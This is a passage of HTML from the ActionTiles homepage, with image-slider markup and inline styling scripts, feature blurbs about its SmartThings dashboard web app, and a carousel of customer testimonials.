9;background-color:rgba(255,255,255,0.6);"> </div> <!-- LAYER NR. 6 --> <div class="tp-caption tp-resizeme" id="slide-14-layer-5" data-x="444" data-y="-2" data-width="['none','none','none','none']" data-height="['none','none','none','none']" data-type="image" data-responsive_offset="on" data-frames='[{"delay":5000,"speed":1000,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":0,"frame":"999","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[11,11,11,11]" data-paddingright="[11,11,11,11]" data-paddingbottom="[11,11,11,11]" data-paddingleft="[11,11,11,11]" style="z-index: 10;"><img src="https://i2.wp.com/www.actiontiles.com/wp-content/plugins/revslider/admin/assets/images/dummy.png?resize=512%2C512&#038;ssl=1" alt="" data-ww="106px" data-hh="106px" width="512" height="512" data-lazyload="https://www.actiontiles.com/wp-content/uploads/2017/02/orange-grey-clear-bg-512-1.png" data-no-retina data-recalc-dims="1"> </div> <!-- LAYER NR. 7 --> <div class="tp-caption AT_very_large_text tp-resizeme" id="slide-14-layer-3" data-x="right" data-hoffset="6" data-y="center" data-voffset="-214" data-width="['663']" data-height="['61']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":5400,"speed":1000,"frame":"0","from":"opacity:0;","to":"o:1;sX:0.97;","ease":"Elastic.easeInOut"},{"delay":"+0","speed":500,"frame":"999","to":"auto:auto;","ease":"Power3.easeInOut"}]' data-textAlign="['right','right','right','right']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 11; min-width: 663px; max-width: 663px; max-width: 61px; max-width: 61px; white-space: nowrap; letter-spacing: ;">ActionTiles </div> <!-- LAYER NR. 8 --> <div class="tp-caption AT_very_large_text tp-resizeme" id="slide-14-layer-18" data-x="right" data-hoffset="5" data-y="center" data-voffset="-213" data-width="['663']" data-height="['61']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":6920,"speed":1000,"frame":"0","from":"opacity:0;","to":"o:1;sX:0.97;","ease":"Power3.easeOut"},{"delay":"wait","speed":500,"frame":"999","ease":"Power3.easeInOut"}]' data-textAlign="['right','right','right','right']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 12; min-width: 663px; max-width: 663px; max-width: 61px; max-width: 61px; white-space: nowrap; letter-spacing: ;">ActionTiles </div> <!-- LAYER NR. 9 --> <div class="tp-caption very_large_text tp-resizeme" id="slide-14-layer-1" data-x="right" data-hoffset="16" data-y="center" data-voffset="-122" data-width="['563']" data-height="['41']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":8700,"speed":2700,"frame":"0","from":"y:bottom;","to":"o:1;","ease":"Power2.easeOut"},{"delay":"wait","speed":0,"frame":"999","ease":"Power3.easeInOut"}]' data-textAlign="['right','right','right','right']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 13; min-width: 563px; max-width: 563px; max-width: 41px; max-width: 41px; white-space: nowrap; line-height: 40px; color: rgba(239,108,1,1); letter-spacing: px;font-family:Roboto;">Available Now! </div> <!-- LAYER NR. 10 --> <a class="tp-caption rev-btn tp-resizeme" href="#subscribe" target="_self" id="slide-14-layer-9" data-x="right" data-hoffset="24" data-y="bottom" data-voffset="24" data-width="['auto']" data-height="['auto']" data-visibility="['off','off','off','off']" data-type="button" data-actions='' data-responsive_offset="on" data-frames='[{"delay":11010,"speed":4000,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","ease":"Power3.easeInOut"},{"frame":"hover","speed":"0","ease":"Linear.easeNone","to":"o:1;rX:0;rY:0;rZ:0;z:0;","style":"c:rgba(255,255,255,1);bg:rgba(104,159,56,1);bs:solid;bw:0 0 0 0;"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[12,12,12,12]" data-paddingright="[35,35,35,35]" data-paddingbottom="[12,12,12,12]" data-paddingleft="[35,35,35,35]" style="z-index: 14; white-space: nowrap; font-size: 30px; line-height: 25px; font-weight: 500; color: rgba(255,255,255,1); letter-spacing: px;font-family:Roboto;background-color:rgba(51,105,30,1);border-color:rgba(0,0,0,1);outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;cursor:pointer;text-decoration: none;">Reserve Now </a> <!-- LAYER NR. 11 --> <a class="tp-caption rev-btn tp-resizeme" href="https://www.actiontiles.com/get_started_button" target="_self" id="slide-14-layer-19" data-x="right" data-hoffset="27" data-y="bottom" data-voffset="23" data-width="['auto']" data-height="['auto']" data-visibility="['on','on','on','off']" data-type="button" data-actions='' data-responsive_offset="on" data-frames='[{"delay":11010,"speed":4000,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","ease":"Power3.easeInOut"},{"frame":"hover","speed":"0","ease":"Linear.easeNone","to":"o:1;rX:0;rY:0;rZ:0;z:0;","style":"c:rgba(255,255,255,1);bg:rgba(104,159,56,1);bs:solid;bw:0 0 0 0;"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[12,12,12,12]" data-paddingright="[35,35,35,35]" data-paddingbottom="[12,12,12,12]" data-paddingleft="[35,35,35,35]" style="z-index: 15; white-space: nowrap; font-size: 30px; line-height: 25px; font-weight: 500; color: rgba(255,255,255,1); letter-spacing: px;font-family:Roboto;background-color:rgba(51,105,30,1);border-color:rgba(0,0,0,1);outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;cursor:pointer;text-decoration: none;">Take Action! </a> </li> <!-- SLIDE --> <li data-index="rs-10" data-transition="notransition" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/panel-metro.png?fit=1167%2C731&ssl=1" data-delay="9499" data-rotate="0" data-saveperformance="off" data-title="Metro Screen" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://i2.wp.com/www.actiontiles.com/wp-content/plugins/revslider/admin/assets/images/dummy.png?resize=1167%2C731&#038;ssl=1" alt="" title="panel-metro" width="1167" height="731" data-lazyload="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/panel-metro.png?fit=1167%2C731&ssl=1" data-bgposition="center center" data-kenburns="on" data-duration="5000" data-ease="Power0.easeOut" data-scalestart="200" data-scaleend="100" data-rotatestart="0" data-rotateend="0" data-blurstart="0" data-blurend="0" data-offsetstart="0 40" data-offsetend="0 0" data-bgparallax="off" class="rev-slidebg" data-no-retina data-recalc-dims="1"> <!-- LAYERS --> <!-- LAYER NR. 12 --> <div class="tp-caption AT_very_large_text tp-resizeme" id="slide-10-layer-4" data-x="center" data-hoffset="-121" data-y="center" data-voffset="-214" data-width="['663']" data-height="['61']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":4400.0003814697,"speed":1000,"frame":"0","from":"y:bottom;","to":"o:1;sX:0.97;","ease":"Power2.easeOut"},{"delay":"+1689.9367523194","split":"chars","splitdelay":0.1,"speed":500,"frame":"999","to":"y:50px;opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['center','center','center','center']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7; min-width: 663px; max-width: 663px; max-width: 61px; max-width: 61px; white-space: nowrap; font-size: 70px; color: rgba(244,244,244,1);">Your smart home at a glance! </div> </li> <!-- SLIDE --> <li data-index="rs-9" data-transition="notransition" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/stage1_1100x600_Q60_lowCrop.jpg?fit=1100%2C600&ssl=1" data-delay="10019" data-rotate="0" data-saveperformance="off" data-title="Brick Mantle" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://i2.wp.com/www.actiontiles.com/wp-content/plugins/revslider/admin/assets/images/dummy.png?resize=1100%2C600&#038;ssl=1" alt="" title="stage1_1100x600_Q60_lowCrop" width="1100" height="600" data-lazyload="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/stage1_1100x600_Q60_lowCrop.jpg?fit=1100%2C600&ssl=1" data-bgposition="center center" data-kenburns="on" data-duration="5000" data-ease="Linear.easeNone" data-scalestart="195" data-scaleend="100" data-rotatestart="0" data-rotateend="0" data-blurstart="0" data-blurend="0" data-offsetstart="0 20" data-offsetend="0 0" data-bgparallax="off" class="rev-slidebg" data-no-retina data-recalc-dims="1"> <!-- LAYERS --> <!-- LAYER NR. 13 --> <div class="tp-caption AT_very_large_text tp-resizeme" id="slide-9-layer-1" data-x="center" data-hoffset="2" data-y="center" data-voffset="208" data-width="['auto']" data-height="['auto']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":3000,"speed":5000,"frame":"0","from":"opacity:0;","to":"o:1;sX:0.97;","ease":"Power4.easeOut"},{"delay":"+0.0006103515625","speed":1000,"frame":"999","to":"opacity:0;","ease":"Power4.easeIn"}]' data-textAlign="['center','center','center','center']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5; white-space: nowrap; font-size: 60px;font-style:italic;">The homepage for your home!<span style="font-size: 25px; vertical-align: 1.1em;"> TM</span> </div> </li> <!-- SLIDE --> <li data-index="rs-4" data-transition="fadethroughtransparent" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2014/04/14884553_214644405627194_2202187951400185222_o1.jpg?fit=1080%2C1373&ssl=1" data-delay="5500" data-rotate="0" data-saveperformance="off" data-title="Sbolloz Screen" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://i2.wp.com/www.actiontiles.com/wp-content/plugins/revslider/admin/assets/images/dummy.png?resize=1080%2C1373&#038;ssl=1" alt="" title="14884553_214644405627194_2202187951400185222_o1" width="1080" height="1373" data-lazyload="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2014/04/14884553_214644405627194_2202187951400185222_o1.jpg?fit=1080%2C1373&ssl=1" data-bgposition="left center" data-kenburns="on" data-duration="5000" data-ease="Linear.easeNone" data-scalestart="100" data-scaleend="170" data-rotatestart="0" data-rotateend="0" data-blurstart="0" data-blurend="0" data-offsetstart="0 0" data-offsetend="0 0" data-bgparallax="1" class="rev-slidebg" data-no-retina data-recalc-dims="1"> <!-- LAYERS --> </li> <!-- SLIDE --> <li data-index="rs-15" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-thumb="https://i0.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/QuartzLutron_1100x550_Q65.jpg?fit=1100%2C550&ssl=1" data-delay="9990" data-rotate="0" data-saveperformance="off" data-title="QuartzLutronDoor" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://i2.wp.com/www.actiontiles.com/wp-content/plugins/revslider/admin/assets/images/dummy.png?resize=1100%2C550&#038;ssl=1" alt="" title="QuartzLutron_1100x550_Q65" width="1100" height="550" data-lazyload="https://i0.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/QuartzLutron_1100x550_Q65.jpg?fit=1100%2C550&ssl=1" data-bgposition="right top" data-kenburns="on" data-duration="5000" data-ease="Linear.easeNone" data-scalestart="100" data-scaleend="130" data-rotatestart="0" data-rotateend="0" data-blurstart="0" data-blurend="0" data-offsetstart="0 0" data-offsetend="-180 -5" data-bgparallax="off" class="rev-slidebg" data-no-retina data-recalc-dims="1"> <!-- LAYERS --> <!-- LAYER NR. 14 --> <div class="tp-caption AT_very_large_text tp-resizeme" id="slide-15-layer-1" data-x="right" data-hoffset="26" data-y="center" data-voffset="148" data-width="['614']" data-height="['60']" data-type="text" data-basealign="slide" data-responsive_offset="on" data-frames='[{"delay":4000,"speed":1000,"frame":"0","from":"y:50px;opacity:0;","to":"o:1;sX:0.97;","ease":"Power2.easeOut"},{"delay":"wait","speed":0,"frame":"999","ease":"Power3.easeInOut"}]' data-textAlign="['left','left','left','left']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5; min-width: 614px; max-width: 614px; max-width: 60px; max-width: 60px; white-space: nowrap; font-size: 60px;">Plays well with others... </div> <!-- LAYER NR. 15 --> <div class="tp-caption AT_very_large_text tp-resizeme" id="slide-15-layer-2" data-x="right" data-hoffset="25" data-y="center" data-voffset="206" data-width="['926']" data-height="['60']" data-type="text" data-basealign="slide" data-responsive_offset="on" data-frames='[{"delay":5500.0006103516,"speed":1500,"frame":"0","from":"y:50px;opacity:0;","to":"o:1;sX:0.97;","ease":"Power4.easeOut"},{"delay":"wait","speed":0,"frame":"999","ease":"Power3.easeInOut"}]' data-textAlign="['right','right','right','right']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; min-width: 926px; max-width: 926px; max-width: 60px; max-width: 60px; white-space: nowrap; font-size: 50px;">A perfect companion to smart switches! </div> </li> </ul> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div> </div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=".tp-caption.very_large_text,.very_large_text{color:#fff;font-weight:700;font-size:60px;line-height:60px;font-family:Arial;border-width:0px;border-style:none;position:absolute;text-shadow:-0.03em -0.03em 0.01em rgba(0,0,0,0.5);white-space:nowrap;letter-spacing:-1px}.tp-caption.AT_very_large_text,.AT_very_large_text{color:rgba(239,108,1,1.00);font-size:105px;line-height:60px;font-weight:700;font-style:normal;font-family:Roboto;text-decoration:none;background-color:rgba(0,0,0,0);border-color:transparent;border-style:none;border-width:0px 0px 0px 0px;border-radius:0px 0px 0px 0px;position:absolute;text-shadow:-0.03em -0.03em 0.01em rgba(0,0,0,0.5);white-space:nowrap;letter-spacing:-1px}"; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <script type="text/javascript"> if (setREVStartSize!==undefined) setREVStartSize( {c: '#rev_slider_1_1', gridwidth: [1100], gridheight: [550], sliderLayout: 'auto'}); var revapi1, tpj; (function() { if (!/loaded|interactive|complete/.test(document.readyState)) document.addEventListener("DOMContentLoaded",onLoad); else onLoad(); function onLoad() { if (tpj===undefined) { tpj = jQuery; if("off" == "on") tpj.noConflict();} if(tpj("#rev_slider_1_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_1_1"); }else{ revapi1 = tpj("#rev_slider_1_1").show().revolution({ sliderType:"standard", jsFileLocation:"//www.actiontiles.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"auto", dottedOverlay:"none", delay:8000, navigation: { keyboardNavigation:"off", keyboard_direction: "horizontal", mouseScrollNavigation:"off", mouseScrollReverse:"default", onHoverStop:"off", touch:{ touchenabled:"on", touchOnDesktop:"off", swipe_threshold: 0.7, swipe_min_touches: 1, swipe_direction: "horizontal", drag_block_vertical: false } , arrows: { style:"hephaistos", enable:true, hide_onmobile:true, hide_under:0, hide_onleave:true, hide_delay:300, hide_delay_mobile:500, tmp:'', left: { h_align:"left", v_align:"center", h_offset:10, v_offset:0 }, right: { h_align:"right", v_align:"center", h_offset:10, v_offset:0 } } }, visibilityLevels:[1240,1024,778,480], gridwidth:1100, gridheight:550, lazyType:"smart", scrolleffect: { blur:"on", on_slidebg:"on", }, parallax: { type:"mouse", origo:"enterpoint", speed:400, speedbg:0, speedls:0, levels:[7,4,3,2,5,4,3,2,1,0,47,48,49,50,51,55], }, shadow:0, spinner:"spinner1", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"on", hideSliderAtLimit:0, hideCaptionAtLimit:600, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", nextSlideOnWindowFocus:"off", disableFocusListener:false, } }); }; /* END OF revapi call */ }; /* END OF ON LOAD FUNCTION */ }()); /* END OF WRAPPING FUNCTION */ </script> <script> var htmlDivCss = ' #rev_slider_1_1_wrapper .tp-loader.spinner1{ background-color: #f28100 !important; } '; var htmlDiv = document.getElementById('rs-plugin-settings-inline-css'); if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; } else{ var htmlDiv = document.createElement('div'); htmlDiv.innerHTML = '<style>' + htmlDivCss + '</style>'; document.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]); } </script> <script> var htmlDivCss = unescape(".hephaistos.tparrows%20%7B%0A%09cursor%3Apointer%3B%0A%09background%3Argba%280%2C0%2C0%2C0.5%29%3B%0A%09width%3A40px%3B%0A%09height%3A40px%3B%0A%09position%3Aabsolute%3B%0A%09display%3Ablock%3B%0A%09z-index%3A100%3B%0A%20%20%20%20border-radius%3A50%25%3B%0A%7D%0A.hephaistos.tparrows%3Ahover%20%7B%0A%09background%3Argba%280%2C%200%2C%200%2C%201%29%3B%0A%7D%0A.hephaistos.tparrows%3Abefore%20%7B%0A%09font-family%3A%20%22revicons%22%3B%0A%09font-size%3A18px%3B%0A%09color%3Argb%28255%2C%20255%2C%20255%29%3B%0A%09display%3Ablock%3B%0A%09line-height%3A%2040px%3B%0A%09text-align%3A%20center%3B%0A%7D%0A.hephaistos.tparrows.tp-leftarrow%3Abefore%20%7B%0A%09content%3A%20%22%5Ce82c%22%3B%0A%20%20%20%20margin-left%3A-2px%3B%0A%20%20%0A%7D%0A.hephaistos.tparrows.tp-rightarrow%3Abefore%20%7B%0A%09content%3A%20%22%5Ce82d%22%3B%0A%20%20%20%20margin-right%3A-2px%3B%0A%7D%0A%0A%0A"); var htmlDiv = document.getElementById('rs-plugin-settings-inline-css'); if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; } else{ var htmlDiv = document.createElement('div'); htmlDiv.innerHTML = '<style>' + htmlDivCss + '</style>'; document.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]); } </script> </div><!-- END REVOLUTION SLIDER --></div></div></div></div></div></div></section><section class="l-section wpb_row height_small" id="start"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h1 style="text-align: center;"><strong>ActionTiles is&#8230;</strong></h1> </div> </div> <div class="w-separator type_invisible size_small thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div><div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-4 wpb_column vc_column_container animate_afc"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-iconbox iconpos_top style_circle color_primary"><div class="w-iconbox-icon"><i class="material-icons">settings</i></div><h4 class="w-iconbox-title">Simple</h4><div class="w-iconbox-text">Web-App with no download required. Create a login, link to your SmartThings Location, and build Tiles and Panels &#8211; all in your browser. Online help and email support.</div></div></div></div></div><div class="vc_col-sm-4 wpb_column vc_column_container animate_afc d1"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-iconbox iconpos_top style_circle color_primary"><div class="w-iconbox-icon"><i class="material-icons">fast_forward</i></div><h4 class="w-iconbox-title">Fast</h4><div class="w-iconbox-text">Completely rebuilt platform that responds instantly to smart home events. Supports unlimited number of Panels (dashboards) and multiple Locations on one Panel.</div></div></div></div></div><div class="vc_col-sm-4 wpb_column vc_column_container animate_afc d2"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-iconbox iconpos_top style_circle color_primary"><div class="w-iconbox-icon"><i class="material-icons">lock</i></div><h4 class="w-iconbox-title">Secure</h4><div class="w-iconbox-text">Login to ActionTiles and no longer share your SmartThings password. Sessions stay connected until you&#8217;re ready to logout. Share Panels safely with family, friends, or neighbors.</div></div></div></div></div></div></div></div></div></div></div></section><section class="l-section wpb_row height_small color_secondary"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_middle"><div class="vc_col-sm-12 wpb_column vc_column_container animate_afc"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-iconbox iconpos_top style_circle color_primary no_title no_text at-iconbox-link"><a class="w-iconbox-link" href="https://www.actiontiles.com/news/compliments"><div class="w-iconbox-icon"><i class="fa fa-star fa-star"></i></div></a></div> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h4 style="text-align: center; padding-bottom: 20px;"><a style="text-decoration: underline;" href="https://www.actiontiles.com/news/compliments">Loved by our Customers!</a></h4> </div> </div> </div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center"><div class="w-image-h"><img width="600" height="400" src="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/thanks-1804597_640.jpg?resize=600%2C400&amp;ssl=1" class="attachment-us_600_400_crop size-us_600_400_crop jetpack-lazy-image" alt="" data-lazy-srcset="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/thanks-1804597_640.jpg?w=640&amp;ssl=1 640w, https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/thanks-1804597_640.jpg?resize=600%2C400&amp;ssl=1 600w, https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/thanks-1804597_640.jpg?resize=300%2C201&amp;ssl=1 300w, https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/thanks-1804597_640.jpg?resize=272%2C182&amp;ssl=1 272w" data-lazy-sizes="(max-width: 600px) 100vw, 600px" data-lazy-src="https://i2.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/thanks-1804597_640.jpg?resize=600%2C400&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></div></div></div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div id="ult-carousel-6028693885cdd782e4fa7d" class="ult-carousel-wrapper vc_custom_1487676040338 ult_horizontal" data-gutter="10" data-rtl="false" ><div class="ult-carousel-16102398425cdd782e4fa00 " ><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>You guys have done an outstanding job - Product ROCKS! If you have less techie family members or guests you want to access your smart home, ActionTiles is a must. I use it for almost all my daily interactions with SmartThings. Love the media tiles; Weather Tiles; PIN security option on Tiles, ... Highly customizable.</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Tom F.</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>ActionTiles really steals the show. Jump on this if you haven't! It's exactly what most people imagine an interface to be when they think of a connected home.</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Luis in Cypress, CA</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>Setup in 10 minutes after receiving the invite. Added SmartThings devices, Harmony devices, cameras and have it running on PCs, tablets and iPhone. No problems and I am loving it!!</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Paul in Mooresville, NC</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>I'm a man of few words. All I have to say about ActionTiles is one word: Outstanding!</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Steven in Lihue, HI</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>Thank-you for all your hard work developing a GREAT UI for SmartThings! It sure makes it so much easier and enjoyable.</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Brandon in Delaplaine, AR</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>I could not have dreamt how incredible this product was going to be in improving on the standard SmartThings user interaction experience. Bravo for a job done with excellence!</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Dale</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>Best thing since SmartThings itself!</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Roy in South Staffs, UK</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>Awesome customer service!! Had an issue with ActionTiles and it was solved in about 24 hours. I didn't expect that... Nice job guys!!!</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Brian in Canal Fulton, OH</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>Great, great work on this. Can't wait for everyone else to get their hands on it.</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Brian in Murfreesboro, TN</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q> Loving it!! You'll be amazed at how much easier it is than SmartTiles.</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Roy in South Staffs, UK</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>It is way past my bedtime. I can't stop exploring, this product is fabulous. Seriously you guys nailed it!</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Issaga in Columbus, OH</span><span class="cl-review-author-occupation">ActionTiles Customer</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>ActionTiles changed our smart house into a fully automated and sophisticated home. Its ease, appearance and features are superior to other products costing much more.</q></div><div class="cl-review-author" style="font-size:16px;"><span class="cl-review-author-name">Shawn in Paso Robles, CA</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>Finally, software that can be used in the real world.</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Ste Mac</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>SmartThings enabled us to standardize on a single home automation platform. ActionTiles is the user-friendly way to help us take it to the next level. It's the only interface we use.</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Darold in Texas</span><span 